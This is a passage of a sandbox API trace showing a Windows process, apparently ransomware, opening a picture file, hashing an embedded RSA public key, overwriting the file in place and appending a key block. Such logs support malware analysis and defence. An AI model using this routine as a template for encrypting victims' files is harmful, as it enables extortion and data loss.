ftLastWriteTime.dwHighDateTime=0x1d89f23, nFileSizeHigh=0x0, nFileSizeLow=0xce4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_yDMBp0zwbtzU.gif", cAlternateFileName="_YDMBP~1.GIF")) returned 1 [0193.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0193.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.046] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\_yDMBp0zwbtzU.gif") returned=".gif" [0193.046] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\_yDMBp0zwbtzU.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\_ydmbp0zwbtzu.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.047] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=3300) returned 1 [0193.047] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.050] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xcbe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.050] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.053] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.053] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xce4, lpOverlapped=0x0) returned 1 [0193.053] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.053] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.053] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.053] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eaa30) returned 1 [0193.054] CryptCreateHash (in: hProv=0x6eaa30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.054] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.054] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.054] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.054] GetLastError () returned 0x0 [0193.054] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.054] CryptReleaseContext (hProv=0x6eaa30, dwFlags=0x0) returned 1 [0193.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.055] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.055] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.055] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xce0) returned 0x2d47778 [0193.055] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41de8 [0193.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39df0 [0193.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41e30 [0193.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e08 [0193.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e38 [0193.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e98 [0193.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e50 [0193.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.056] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0193.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0193.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e98 [0193.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0193.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e50 [0193.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39e38 [0193.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0193.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0193.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0193.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0193.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0193.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0193.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.060] GetCurrentThreadId () returned 0x264 [0193.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45820 [0193.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0193.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0193.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.061] GetCurrentThreadId () returned 0x264 [0193.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0193.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e98 [0193.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e38 [0193.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0193.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e50 [0193.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e20 [0193.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39eb0 [0193.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0193.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e80 [0193.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e68 [0193.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ec8 [0193.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0193.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e68 [0193.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0193.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0193.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0193.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0193.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e38 [0193.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0193.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0193.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0193.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0193.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0193.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0193.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0193.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41e30 | out: hHeap=0x6a0000) returned 1 [0193.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.073] WriteFile (in: hFile=0x584, lpBuffer=0x2d47778*, nNumberOfBytesToWrite=0xcdf, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d47778*, lpNumberOfBytesWritten=0x30ffb14*=0xcdf, lpOverlapped=0x0) returned 1 [0193.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47778 | out: hHeap=0x6a0000) returned 1 [0193.074] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xce4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.074] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: 